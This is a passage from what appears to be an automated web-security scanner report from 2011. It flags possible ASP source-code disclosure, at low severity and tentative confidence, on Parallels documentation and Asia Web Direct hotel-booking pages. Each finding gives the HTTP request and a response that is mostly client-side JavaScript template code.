Severity:   Low
Confidence:   Tentative
Host:   http://download1.parallels.com
Path:   /PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-user-guide/prettify.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-user-guide/prettify.js HTTP/1.1
Host: download1.parallels.com
Proxy-Connection: keep-alive
Referer: http://download1.parallels.com/PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-user-guide/39585.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aspcms_sid=d7aaa062b220f34045ee842b61dd35f8; __utmz=1.1306243398.5.3.utmcsr=webmail.nosedivesailing.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/portal/sidebar.php; __utma=1.1253792871.1305655713.1306182369.1306243398.5; s_vnum=1337191716908%26vn%3D5

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1200
Content-Type: application/x-javascript
Date: Fri, 24 Jun 2011 14:51:27 GMT
ETag: "1188a1c3-99c0-2a44c400"
Expires: Fri, 24 Jun 2011 15:11:27 GMT
Last-Modified: Thu, 27 May 2010 10:50:56 GMT
Server: Apache/2.0.40 (Red Hat Linux)
Content-Length: 39360

// Copyright (C) 2006 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy
...[SNIP]...
<\?[\s\S]*?(?:\?>|$)/, null],
//Updated by D.Nosov. Remove markup from declarartions. WAS: PR_SOURCE
[PR_SOURCE, /^<%[\s\S]*?(?:%>|$)/, null],
[PR_SOURCE,
// Tags whose content is not escaped, and which contain source code.
/^<(script|style|xmp)\b[^>
...[SNIP]...
15.6. http://hotels.asiawebdirect.com/min/f=awdShared/js/prototype.js,awdShared/chromejs/chrome.js,awdShared/js/jquery.js,awdShared/js/jquery-ui.js,awdShared/js/supersearch.js,awdShared/js/destinationnav.js,awdShared/js/redesign_js.js,awdShared/js/template.js,awdShared/js/scriptaculous.js,awdShared/js/effects.js,awdShared/js/builder.js,awdShared/js/livepipe.js,awdShared/js/slider.js,awdShared/js/scrollbar.js,awdShared/js/destinationbox.js,awdShared/js/lightbox.js,awdShared/js/gblcalendar.js,/scripts/placeholders.js&5678  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://hotels.asiawebdirect.com
Path:   /min/f=awdShared/js/prototype.js,awdShared/chromejs/chrome.js,awdShared/js/jquery.js,awdShared/js/jquery-ui.js,awdShared/js/supersearch.js,awdShared/js/destinationnav.js,awdShared/js/redesign_js.js,awdShared/js/template.js,awdShared/js/scriptaculous.js,awdShared/js/effects.js,awdShared/js/builder.js,awdShared/js/livepipe.js,awdShared/js/slider.js,awdShared/js/scrollbar.js,awdShared/js/destinationbox.js,awdShared/js/lightbox.js,awdShared/js/gblcalendar.js,/scripts/placeholders.js&5678

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /min/f=awdShared/js/prototype.js,awdShared/chromejs/chrome.js,awdShared/js/jquery.js,awdShared/js/jquery-ui.js,awdShared/js/supersearch.js,awdShared/js/destinationnav.js,awdShared/js/redesign_js.js,awdShared/js/template.js,awdShared/js/scriptaculous.js,awdShared/js/effects.js,awdShared/js/builder.js,awdShared/js/livepipe.js,awdShared/js/slider.js,awdShared/js/scrollbar.js,awdShared/js/destinationbox.js,awdShared/js/lightbox.js,awdShared/js/gblcalendar.js,/scripts/placeholders.js&5678 HTTP/1.1
Host: hotels.asiawebdirect.com
Proxy-Connection: keep-alive
Referer: http://hotels.asiawebdirect.com/thailand/phuket/hotels/?mtxPortal=phuket.com&mtxDestinationId=75&mtxCatRange=1-5&mtxPriceRange=0-Unlimited&mtxCheckIn=20110624&mtxCheckOut=20110625&mtxSortBy=Category&mtxBoxName=phuket.com%20small%20box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=191982906.00014641700566752900:4:1; __utmxx=191982906.00014641700566752900:3251620:2592000; symfony=2f8967ec23269ed5ba0a930cec9f6d13

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:21:21 GMT
Server: Apache/2.2.17
Expires: Sat, 23 Jun 2012 13:21:21 GMT
Vary: Accept-Encoding
Last-Modified: Thu, 19 May 2011 04:42:39 GMT
ETag: "pub1305780159;gz"
Cache-Control: max-age=31536000, public
Content-Length: 356374
Content-Type: application/x-javascript; charset=utf-8

var Prototype={Version:'1.6.1',Browser:(function(){var ua=navigator.userAgent;var isOpera=Object.prototype.toString.call(window.opera)=='[object Opera]';return{IE:!!window.attachEvent&&!isOpera,Opera:
...[SNIP]...
mpl=function tmpl(str,data){str=document.getElementById(str).value;var functionBody="var p=[],print=function(){p.push.apply(p,arguments);};"
+"with(obj){p.push('"
+
str.replace(/[\r\t\n]/g," ").split("<%").join("\t").replace(/((^|%>)[^\t]*)'/g,"$1\r").replace(/\t=(.*?)%>
...[SNIP]...
{str=document.getElementById(str).value;str='/*st*/\''+str+'\'/*en*/';var functionBody="var p=[],print=function(){p.push.apply(p,arguments);};"+"with(obj){p.push("+
str.replace(/[\r\t\n]/g," ").split("<%").join("\t").replace(/\t=(.*?)%>/g,"'/*en*/,$1,/*st*/'").split("\t").join("'/*en*/);").split("%>
...[SNIP]...
is.tmpl_str=function tmpl_str(str,data){str='/*st*/\''+str+'\'/*en*/';var functionBody="var p=[],print=function(){p.push.apply(p,arguments);};"+"with(obj){p.push("+
str.replace(/[\r\t\n]/g," ").split("<%").join("\t").replace(/\t=(.*?)%>/g,"'/*en*/,$1,/*st*/'").split("\t").join("'/*en*/);").split("%>
...[SNIP]...
15.7. http://rates.asiawebdirect.com/asahi/frontend.php/rates/dest/en/75/checkIn/14/true/20110624/20110625  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://rates.asiawebdirect.com
Path:   /asahi/frontend.php/rates/dest/en/75/checkIn/14/true/20110624/20110625

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /asahi/frontend.php/rates/dest/en/75/checkIn/14/true/20110624/20110625 HTTP/1.1
Host: rates.asiawebdirect.com
Proxy-Connection: keep-alive
Referer: http://hotels.asiawebdirect.com/thailand/phuket/hotels/?mtxPortal=phuket.com&mtxDestinationId=75&mtxCatRange=1-5&mtxPriceRange=0-Unlimited&mtxCheckIn=20110624&mtxCheckOut=20110625&mtxSortBy=Category&mtxBoxName=phuket.com%20small%20box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=191982906.00014641700566752900:4:1; __utmxx=191982906.00014641700566752900:3251620:2592000; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:21:26 GMT
Server: Apache/2.2.17
Expires: Fri, 24 Jun 2011 14:21:39 GMT
Cache-Control: max-age=3600
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Content-Length: 1677331

if (!window.matrix) {
window.matrix = new Matrix(
75,
'today',
14,
'en',
true,
'matrix',
true,
12);
window.matrix.enableXDomain(
...[SNIP]...
<div id=\"currencyGroup\" name=\"currencyGroup\" isoCode=\"<%=currency%>\">\n<%\n var urlExtraParams = [];\n if (detail.checkIn != null) {\n urlExtraParams.push(['mtxCheckIn', detail.checkIn]);\n urlExtraParams.push(['mtxCheckOut', detail.checkOut]);\n }\n \n if (window['mtx_portal']) {\n urlExtraParams.push(['mtxPortal', window.mtx_portal]);\n }\n \n var urlExtra = \"\";\n var urlParams = \"\";\n for (var i = 0; i < urlExtraParams.length; i++) {\n if (urlParams != \"\") urlParams += \"&\";\n urlParams += urlExtraParams[i][0] + '=' + urlExtraParams[i][1];\n }\n if (urlParams != \"\") urlExtra = \"?\" + urlParams;\n%>\n\n <div name=\"dealBlock\" id=\"dealBlock\" class=\"mtx_dealBlock\">
...[SNIP]...
<!-- currency converter cell -->\n <% var cSpan = dates.length - 2; %>\n <td>
...[SNIP]...
<td align=\"center\" colspan=\"<%=cSpan%>\">\n <% var tax_string = (parseFloat(ServicePercent)>0) ? 'exclusive of service tax and fees' : 'tax inclusive'; %>\n <label class=\"mtx_dest_currency_label\">
...[SNIP]...
<select name='ccSelect' onchange='setCurrency(this);'>\n <% for (var i = 0; i < currencies.length; i++) {\n var c = currencies[i];\n %>\n <option value=\"<%=c.code%>|<%=c.rate%>\" <%if (c.selected) {%>selected=\"selected\"<%}%>><%=c.code%> - <%=c.name%><\/option>
...[SNIP]...
<label class=\"mtx_dest_currency_label\">and are <%=tax_string%><\/label>
...[SNIP]...
<\/tr>\n \n <%=dateRow%>\n <!-- Remove previous\/next button if any -->\n <%\n var prevBtnStart = dateRow.indexOf('PreviousButtonStart');\n if (prevBtnStart > -1) {\n \tvar prevBtnEnd = dateRow.indexOf('PreviousButtonEnd');\n \tdateRow = dateRow.substr(0, prevBtnStart-5) + dateRow.substr(prevBtnEnd+21);\n }\n var nxtBtnStart = dateRow.indexOf('NextButtonStart');\n if (nxtBtnStart > -1) {\n \tvar nxtBtnEnd = dateRow.indexOf('NextButtonEnd');\n \tdateRow = dateRow.substr(0, nxtBtnStart-5) + dateRow.substr(nxtBtnEnd+17);\n }\n var span = dates.length+1;\n dateRow = '<tr><td colspan=\"' + span + '\">&nbsp;<\/td><\/tr>' + dateRow;\n %>\n\t\n\t<!-- Featured Hotel -->\n\t<%\n \tif (pagination.pageNo == 1) {\n\t\tfor (var i = 0; i < showFeaturedHotels.length; i++) {\n \t\tvar result = showFeaturedHotels[i];\n\t var even = (i % 2) == 1;\n\t var cssClass = \"mtx_row_title\";\n\t var cssRowClass = \"mtx_rowODD\";\n\t if (even) {\n\t \tcssClass = cssClass + \" mtx_row_title_even\";\n\t \tcssRowClass = \"mtx_rowEVEN\";\n\t }\n\t cssRowClass = cssRowClass + \" mtx_row_featured\";\n %>\n <% if ((i % 16 == 0) && (i != 0) && !showPagination) { %><%=dateRow%><% } %>\n <tr id=\"<%=result.id%>\" class=\"<%=cssRowClass%>\" onmouseover=\"hilightRow(this)\" onmouseout=\"unHilightRow(this)\">
...[SNIP]...
<td class=\"<%=cssClass%>\">
...[SNIP]...
<a href=\"<%=result.url%><%=urlExtra%>\">\n\t\t\t<span class=\"mtx_lst_hotel_name1\" id=\"hn_<%=result.HotelId%>\"><%=result.name%><\/span>
...[SNIP]...
<div>\n\t\t\t<% var guest_rating = '<span style=\"font-size:120%\">';\n var str_guest_rating = result.guest_rating + \"\";\n if (result.guest_rating == 0) {\n\t\t\t %>\n <div class=\"mtx_lst_guest_rating_novalue\" style=\"float:left; margin:0 10px 5px 0;\">
...[SNIP]...
<\/div>\n\t\t\t <%\n } else {\n guest_rating += str_guest_rating.substr(0, 1) + '<\/span>';\n if (str_guest_rating.substr(1) == \"\") {\n guest_rating += \".0\";\n } else {\n guest_rating += str_guest_rating.substr(1);\n } \n %>\n <div class=\"mtx_lst_guest_rating_value\" style=\"float:left; margin:0 10px 5px 0;\"><%=guest_rating%><\/div>
...[SNIP]...
<img style=\"cursor: pointer;\" onload=\"checkShortlistIcon('<%=result.HotelId%>')\" onclick=\"toggleShortlist(<%=result.HotelId%>);\" src=\"http:\/\/rates.asiawebdirect.com\/asahi\/images\/save-button-small.png\" id=\"sl_<%=result.HotelId%>\"\/>
...[SNIP]...
<div style=\"margin-top:5px;\"><%=result.LongArea%><\/div>
...[SNIP]...
<!-- Rate Cells -->\n <% for (var j = 0; j < dates.length; j++) { %>\n <% var d = new Date(dates[j].ts);\n var dayOfWeek = d.format('%a');\n var cssClass = \"mtx_rate mtx_rt_\" + dayOfWeek;\n if (even) cssClass = cssClass + \"_even\";\n if (dates[j].inRes) cssClass = cssClass + \"_res\";\n var rate = result.rates[dates[j].fmt];\n %>\n <% if (rate) {\n if (rate.hot) cssClass = cssClass + \" mtx_HotDeal\";\n if (rate.restrict) cssClass = cssClass + \" mtx_restrictions\";\n var rId = result.id + \"_\" + dates[j].fmt;\n %>\n <td id=\"<%=rId%>\" onmouseover=\"showRateBlurbField(this, 'incl_<%=rId%>', event);\" onmouseout=\"hideRateBlurb(this);\" class=\"<%=cssClass%>\">\n <input type=\"hidden\" id=\"incl_<%=rId%>\" value=\"<%=rate.i%>\" \/>
...[SNIP]...
<span name=\"drc\"><%=rate.pf%><span class=\"or\"><%=rate.p%>:<%=result.currency%><\/span><\/span><%if (rate.restrict) {%><span class=\"mtx_restrictionSymbol\">
...[SNIP]...
<\/td>\n <% } else {\n if (even) cssClass = cssClass + \" mtx_sold_even\";\n else cssClass = cssClass + \" mtx_sold\";\n if (dates[j].inRes) cssClass = cssClass + \"_res\";\n %>\n <td class=\"<%=cssClass%>\" title=\"Sold Out\">
...[SNIP]...
<\/tr>\n <%\n\t\t}\n\t}\n%>\n\n\n <!-- Rate Plan Row -->\n <% for (var i = pagination.startRecord; i < pagination.endRecord; i++) {\n var result = showResults[i];\n var even = (i % 2) == 1;\n var cssClass = \"mtx_row_title\";\n var cssRowClass = \"mtx_rowODD\";\n if (even) {\n \tcssClass = cssClass + \" mtx_row_title_even\";\n \tcssRowClass = \"mtx_rowEVEN\";\n }\n if (result.FeaturedHotel > 0) {\n \tcssRowClass = cssRowClass + \" mtx_row_featured\";\n }\n %>\n <% if ((i % 16 == 0) && (i != 0) && !showPagination) { %><%=dateRow%><% } %>\n <tr id=\"<%=result.id%>\" class=\"<%=cssRowClass%>\" onmouseover=\"hilightRow(this)\" onmouseout=\"unHilightRow(this)\">
...[SNIP]...
<td class=\"<%=cssClass%>\">\n <% if (result.FeaturedHotel > 0) { %>\n <div class=\"mtx_featured_container\">
...[SNIP]...
<a href=\"<%=result.url%><%=urlExtra%>\">\n\t\t\t<span class=\"mtx_lst_hotel_name1\" id=\"hn_<%=result.HotelId%>\"><%=result.name%><\/span>
...[SNIP]...
<div>\n\t\t\t<% var guest_rating = '<span style=\"font-size:120%\">';\n var str_guest_rating = result.guest_rating + \"\";\n if (result.guest_rating == 0) {\n\t\t\t %>\n <div class=\"mtx_lst_guest_rating_novalue\" style=\"float:left; margin:0 10px 5px 0;\">
...[SNIP]...
<\/div>\n\t\t\t <%\n } else {\n guest_rating += str_guest_rating.substr(0, 1) + '<\/span>';\n if (str_guest_rating.substr(1) == \"\") {\n guest_rating += \".0\";\n } else {\n guest_rating += str_guest_rating.substr(1);\n } \n %>\n <div class=\"mtx_lst_guest_rating_value\" style=\"float:left; margin:0 10px 5px 0;\"><%=guest_rating%><\/div>
...[SNIP]...
<img style=\"cursor: pointer;\" onload=\"checkShortlistIcon('<%=result.HotelId%>')\" onclick=\"toggleShortlist(<%=result.HotelId%>);\" src=\"http:\/\/rates.asiawebdirect.com\/asahi\/images\/save-button-small.png\" id=\"sl_<%=result.HotelId%>\"\/>
...[SNIP]...
<div style=\"margin-top:5px;\"><%=result.LongArea%><\/div>
...[SNIP]...
<\/div>\n <% if (result.FeaturedHotel > 0) { %><\/div>
...[SNIP]...
<!-- Rate Cells -->\n <% for (var j = 0; j < dates.length; j++) { %>\n <% var d = new Date(dates[j].ts);\n var dayOfWeek = d.format('%a');\n var cssClass = \"mtx_rate mtx_rt_\" + dayOfWeek;\n if (even) cssClass = cssClass + \"_even\";\n if (dates[j].inRes) cssClass = cssClass + \"_res\";\n var rate = result.rates[dates[j].fmt];\n %>\n <% if (rate) {\n if (rate.hot) cssClass = cssClass + \" mtx_HotDeal\";\n if (rate.restrict) cssClass = cssClass + \" mtx_restrictions\";\n var rId = result.id + \"_\" + dates[j].fmt;\n %>\n <td id=\"<%=rId%>\" onmouseover=\"showRateBlurbField(this, 'incl_<%=rId%>', event);\" onmouseout=\"hideRateBlurb(this);\" class=\"<%=cssClass%>\">\n <input type=\"hidden\" id=\"incl_<%=rId%>\" value=\"<%=rate.i%>\" \/>
...[SNIP]...
<span name=\"drc\"><%=rate.pf%><span class=\"or\"><%=rate.p%>:<%=result.currency%><\/span><\/span><%if (rate.restrict) {%><span class=\"mtx_restrictionSymbol\">
...[SNIP]...
<\/td>\n <% } else {\n if (even) cssClass = cssClass + \" mtx_sold_even\";\n else cssClass = cssClass + \" mtx_sold\";\n if (dates[j].inRes) cssClass = cssClass + \"_res\";\n %>\n <td class=\"<%=cssClass%>\" title=\"Sold Out\">
...[SNIP]...
<% } %>\n \n \n <% if (showResults.length == 0) {\n var colSpan = dates.length + 2;\n %>\n <tr><td class=\"mtx_row_title\" colspan=\"<%=colSpan%>\">
...[SNIP]...
<\/table>\n<% if (showPagination) { %>\n<div class=\"hotelLinks\" id=\"hotel_link\">
...[SNIP]...
<div name=\"prevButton\" style=\"float:left; margin-right:5px;\"><% if (pagination.showPreviousButton) { %><a style=\"text-decoration:none\" href=\"javascript:void(0)\" onclick=\"mtx_movePrevious()\">
...[SNIP]...
<div name=\"nxtButton\" style=\"float:right; margin-left:5px;\"><% if (pagination.showNextButton) { %><a style=\"text-decoration:none\" href=\"javascript:void(0)\" onclick=\"mtx_moveNext()\">
...[SNIP]...
<\/div>\n<% if (pagination.numberOfPage > 1) { %>\n<div class=\"mtx_lst_page_area\">Page:\n<%\nvar iStart = 1;\nvar iEnd = pagination.numberOfPage;\nif (pagination.numberOfPage > 11) {\n\tiStart = pagination.pageNo-5; if (iStart < 1) iStart = 1;\n\tiEnd = iStart+10;\n\tif (iEnd > pagination.numberOfPage) iEnd = pagination.numberOfPage;\n}\nfor (var j=iStart; j<=iEnd; j++) {\n\tif (j==pagination.pageNo) { %>\n\t\t<span class=\"mtx_lst_page_current\">
...[SNIP]...
<\/span>\n\t<% } else { %>\n\t\t<span class=\"mtx_lst_page_link\" onclick=\"mtx_gotoPage('<%=j%>
...[SNIP]...
<\/td>\n <% for (var i = 0; i < dates.length; i++) { %>\n <% var d = new Date(dates[i].ts);\n var dayOfWeek = d.format('%a');\n var cssClass = \"mtx_date_dest mtx_\" + dayOfWeek;\n\t var css_tl = 'mtx_lb_tl'; var css_tr = 'mtx_lb_tr'; \n if (dates[i].inRes) \n\t {\n\t\t\tcssClass = cssClass + \"_res\";\n\t\t\tvar css_tl = 'mtx_lp_tl'; var css_tr = 'mtx_lp_tr'; \n }\n\t var css_move_prev = 'mtx_prevJumpImageWhite'; var css_move_next = 'mtx_nextJumpImageWhite';\n %>\n <td class=\"<%=cssClass%>\">\n <% if (i==0 && hasPrevious) { %>\n <div onclick=\"mtx_prevPageJump()\" title=\"Show previous 7 days\" class=\"<%=css_move_prev%>\">
...[SNIP]...
<div class=\"<%=css_tl%>\">
...[SNIP]...
<div class=\"<%=css_tr%>\">
...[SNIP]...
<% } %>\n <% if (i == dates.length-1) { %>\n <div onclick=\"mtx_nextPageJump()\" title=\"Show next 7 days\" class=\"<%=css_move_next%>\">
...[SNIP]...
<div class=\"<%=css_tl%>\">
...[SNIP]...
<div class=\"<%=css_tr%>\">
...[SNIP]...
<span class=\"mtx_col_header_dayofweek\"><%=dayOfWeek%><\/span>
...[SNIP]...
<span class=\"mtx_col_header_day\"><%=d.format('%e')%><\/span>
...[SNIP]...
<span class=\"mtx_col_header_month\"><%=d.format('%h')%><\/span>
...[SNIP]...
<\/td>\n <% for (var a=0; a<accomList.length; a+=2) {%>\n <td width=\"8px\" class=\"tdCb\">
...[SNIP]...
<%=a%>\" value=\"<%=accomList[a]%>\" \/>
...[SNIP]...
<%=a%>\"><%=accomList[a]%><\/label>
...[SNIP]...
<\/td>\n <% for (var a=1; a<accomList.length; a+=2) {%>\n <td width=\"8px\" class=\"tdCb\">
...[SNIP]...
<%=a%>\" value=\"<%=accomList[a]%>\" \/>
...[SNIP]...
<%=a%>\"><%=accomList[a]%><\/label>
...[SNIP]...
<div name=\"container\" class=\"mtx_lst_container\">\n<%\n var urlExtraParams = [];\n if (detail.checkIn != null) {\n urlExtraParams.push(['mtxCheckIn', detail.checkIn]);\n urlExtraParams.push(['mtxCheckOut', detail.checkOut]);\n }\n \n if (window['mtx_portal']) {\n urlExtraParams.push(['mtxPortal', window.mtx_portal]);\n }\n \n var urlExtra = \"\";\n var urlParams = \"\";\n for (var i = 0; i < urlExtraParams.length; i++) {\n if (urlParams != \"\") urlParams += \"&\";\n urlParams += urlExtraParams[i][0] + '=' + urlExtraParams[i][1];\n }\n if (urlParams != \"\") urlExtra = \"?\" + urlParams;\n%>\n<div id=\"currencyGroup\" name=\"currencyGroup\" isoCode=\"<%=currency%>\">
...[SNIP]...
<div name=\"currency_area\" class=\"mtx_lst_currency_area\">\n<% var tax_string = (parseFloat(ServicePercent)>0) ? 'exclusive of service tax and fees' : 'tax inclusive'; %>\n<label class=\"mtx_dest_currency_label\">
...[SNIP]...
<select name='ccSelect' onchange='setCurrency(this);'>\n <% for (var i = 0; i < currencies.length; i++) {\n var c = currencies[i];\n %>\n <option value=\"<%=c.code%>|<%=c.rate%>\" <%if (c.selected) {%>selected=\"selected\"<%}%>><%=c.code%> - <%=c.name%><\/option>
...[SNIP]...
<label class=\"mtx_dest_currency_label\">and are <%=tax_string%><\/label>
...[SNIP]...
<\/div>\n\n<% \n\tif (pagination.pageNo == 1) {\n\t\tfor (var i = 0; i < showFeaturedHotels.length; i++) {\n \t\tvar result = showFeaturedHotels[i];\n \t\tvar imgUrl = result.image_url;\n \t\tif (result.new_images) imgUrl = 'http:\/\/www.asiawebdirect.com\/media\/images\/hotels\/' + result.HotelId + '\/list_view.jpg';\n if (result.WotifId != null && result.WotifId.length > 0 && result.WotifId[0] == 'M') imageUrl = 'http:\/\/www.asiawebdirect.com\/media\/images\/hotels\/mystery\/list_view.jpg';\n \t\tif ((result.Show) != \"undefined\") if (!result.Show) continue;\n%>\n\t<div class=\"mtx_lst_hotel_div\">
...[SNIP]...
<a style=\"text-decoration: underline\" href=\"<%=result.url%><%=urlExtra%>\"><img width=\"150\" height=\"100\" border=\"0\" src=\"<%=imgUrl%>\" onerror=\"replaceImage(this)\">
...[SNIP]...
<div class=\"mtx_lst_hotel_price_block\">\n\t\t\t<% var original_rate = result.lowestRate.replace(\",\", \"\"); %>\n\t\t\t<div>\n\t\t\t\t<% if (result.lowestRate == 0) { %>\n\t\t\t\t\t<span class=\"mtx_lst_sold\">
...[SNIP]...
<\/span>\n\t\t\t\t<% } else { %>\n\t\t\t\t\t<span class=\"hotelprice1\">
...[SNIP]...
<span name=\"drc\"><%=result.lowestRate%><span class=\"or\"><%=original_rate%>:<%=result.currency%><\/span> <%=result.currency%><\/span>
...[SNIP]...
<\/div>\n\t\t\t<% var rating_display = \"\"; var rating_label = 'STAR RATING';\n\t\t\t\tfor (var j=0; j<result.rating; j++) rating_display += '<img src=\"http:\/\/rates.asiawebdirect.com\/asahi\/images\/star.gif\" \/>';\n\t\t\t\tif (rating_display == '') rating_label = '&nbsp;';\n\t\t\t%>\n\t\t\t<div style=\"float:left; margin-top:4px;\">
...[SNIP]...
<span class=\"mtx_lst_star_span\"><%=rating_display%>&nbsp;<\/span>
...[SNIP]...
<span style=\"color:#FFA80F; font-size:8px;\"><%=rating_label%><\/span>
...[SNIP]...
<\/div>\n\t\t\t<% var guest_rating = '<span style=\"font-size:120%\">';\n\t\t\t\tvar str_guest_rating = result.guest_rating + \"\";\n\t\t\t\tif (result.guest_rating > 0) {\n\t\t\t\t\tguest_rating += str_guest_rating.substr(0, 1) + '<\/span>';\n\t\t\t\t\tif (str_guest_rating.substr(1) == \"\") {\n\t\t\t\t\t\tguest_rating += \".0\";\n\t\t\t\t\t} else {\n\t\t\t\t\t\tguest_rating += str_guest_rating.substr(1);\n\t\t\t\t\t} \n\t\t\t %>\n\t\t\t<div style=\"float:right; text-align:left; margin-top:4px;\"><div class=\"mtx_lst_guest_rating_value\"><%=guest_rating%><\/div>
...[SNIP]...
<a href=\"<%=result.url%><%=urlExtra%>\">
...[SNIP]...
<a href=\"<%=result.url%><%=urlExtra%>\">\n\t\t\t<span class=\"mtx_lst_hotel_name1\" id=\"hn_<%=result.HotelId%>\"><%=result.name%><\/span>
...[SNIP]...
<img style=\"cursor: pointer; float:right;\" onload=\"checkShortlistIcon('<%=result.HotelId%>')\" onclick=\"toggleShortlist(<%=result.HotelId%>);\" src=\"http:\/\/rates.asiawebdirect.com\/asahi\/images\/save-button.png\" id=\"sl_<%=result.HotelId%>\" title=\"Add <%=result.name%> to your shortlist\" \/>\n\t\t <% var desc = result.description;\n\t\t if (desc.length > 100) {\n\t\t\t desc = desc.substr(0, 170);\n\t\t\t var space_pos = desc.lastIndexOf(' ');\n\t\t\t if (space_pos > -1) desc = desc.substr(0, space_pos);\n\t\t }\n\t\t %>\n\t\t\t<div class=\"hotelDetail\">
...[SNIP]...
<div><%=result.LongArea%><\/div>
...[SNIP]...
<span class=\"hotelminitext\"><%=desc%><% if (desc.length > 100) { %> <a href=\"<%=result.url%><%=urlExtra%>\" style=\"color:#0E77AE;white-space:nowrap;\">
...[SNIP]...
<\/div>\n<%\n\t\t}\n\t}\n%>\n\n<% for (var i = pagination.startRecord; i < pagination.endRecord; i++) {\n var result = showResults[i];\n var imgUrl = result.image_url;\n if (result.new_images) imgUrl = 'http:\/\/www.asiawebdirect.com\/media\/images\/hotels\/' + result.HotelId + '\/list_view.jpg';\n if (result.WotifId != null && result.WotifId.length > 0 && result.WotifId[0] == 'M') imgUrl = 'http:\/\/www.asiawebdirect.com\/media\/images\/hotels\/mystery\/list_view.jpg';\n if ((result.Show) != \"undefined\") if (!result.Show) continue;\n%>\n<% if (show_header && (i==0 || showResults[i-1].header!=showResults[i].header)) { %>\n\t<a name=\"<%=result.header%>\"><\/a>\n\t<div class=\"mtxGroupHeader\" style=\"clear:both;\"><%=result.header%><\/div>
...[SNIP]...
<div class=\"mtx_lst_hotel_div\">\n\t\t<% if (result.FeaturedHotel > 0) { %><div class=\"mtx_lst_featuredhotel\">
...[SNIP]...
<a style=\"text-decoration: underline\" href=\"<%=result.url%><%=urlExtra%>\"><img width=\"150\" height=\"100\" border=\"0\" src=\"<%=imgUrl%>\" onerror=\"replaceImage(this)\">
...[SNIP]...
<div class=\"mtx_lst_hotel_price_block\">\n\t\t\t<% var original_rate = result.lowestRate.replace(\",\", \"\"); %>\n\t\t\t<div>\n\t\t\t\t<% if (result.lowestRate == 0) { %>\n\t\t\t\t\t<span class=\"mtx_lst_sold\">
...[SNIP]...
<\/span>\n\t\t\t\t<% } else { %>\n\t\t\t\t\t<span class=\"hotelprice1\">
...[SNIP]...
<span name=\"drc\"><%=result.lowestRate%><span class=\"or\"><%=original_rate%>:<%=result.currency%><\/span> <%=result.currency%><\/span>
...[SNIP]...
<\/div>\n\t\t\t<% var rating_display = \"\"; var rating_label = 'STAR RATING';\n\t\t\t\tfor (var j=0; j<result.rating; j++) rating_display += '<img src=\"http:\/\/rates.asiawebdirect.com\/asahi\/images\/star.gif\" \/>';\n\t\t\t\tif (rating_display == '') rating_label = '&nbsp;';\n\t\t\t%>\n\t\t\t<div style=\"float:left; margin-top:4px;\">
...[SNIP]...
<span class=\"mtx_lst_star_span\"><%=rating_display%>&nbsp;<\/span>
...[SNIP]...
<span style=\"color:#FFA80F; font-size:8px;\"><%=rating_label%><\/span>
...[SNIP]...
<\/div>\n\t\t\t<% var guest_rating = '<span style=\"font-size:120%\">';\n\t\t\t\tvar str_guest_rating = result.guest_rating + \"\";\n\t\t\t\tif (result.guest_rating > 0) {\n\t\t\t\t\tguest_rating += str_guest_rating.substr(0, 1) + '<\/span>';\n\t\t\t\t\tif (str_guest_rating.substr(1) == \"\") {\n\t\t\t\t\t\tguest_rating += \".0\";\n\t\t\t\t\t} else {\n\t\t\t\t\t\tguest_rating += str_guest_rating.substr(1);\n\t\t\t\t\t} \n\t\t\t %>\n\t\t\t<div style=\"float:right; text-align:left; margin-top:4px;\"><div class=\"mtx_lst_guest_rating_value\"><%=guest_rating%><\/div>
...[SNIP]...
<a href=\"<%=result.url%><%=urlExtra%>\">
...[SNIP]...
<a href=\"<%=result.url%><%=urlExtra%>\">\n\t\t\t<span class=\"mtx_lst_hotel_name1\" id=\"hn_<%=result.HotelId%>\"><%=result.name%><\/span>
...[SNIP]...
<img style=\"cursor: pointer; float:right;\" onload=\"checkShortlistIcon('<%=result.HotelId%>')\" onclick=\"toggleShortlist(<%=result.HotelId%>);\" src=\"http:\/\/rates.asiawebdirect.com\/asahi\/images\/save-button.png\" id=\"sl_<%=result.HotelId%>\" title=\"Add <%=result.name%> to your shortlist\" \/>\n\t\t <% var desc = result.description;\n\t\t if (desc.length > 100) {\n\t\t\t desc = desc.substr(0, 170);\n\t\t\t var space_pos = desc.lastIndexOf(' ');\n\t\t\t if (space_pos > -1) desc = desc.substr(0, space_pos);\n\t\t }\n\t\t %>\n\t\t\t<div class=\"hotelDetail\">
...[SNIP]...
<div><%=result.LongArea%><\/div>
...[SNIP]...
<span class=\"hotelminitext\"><%=desc%><% if (desc.length > 100) { %> <a href=\"<%=result.url%><%=urlExtra%>\" style=\"color:#0E77AE;white-space:nowrap;\">
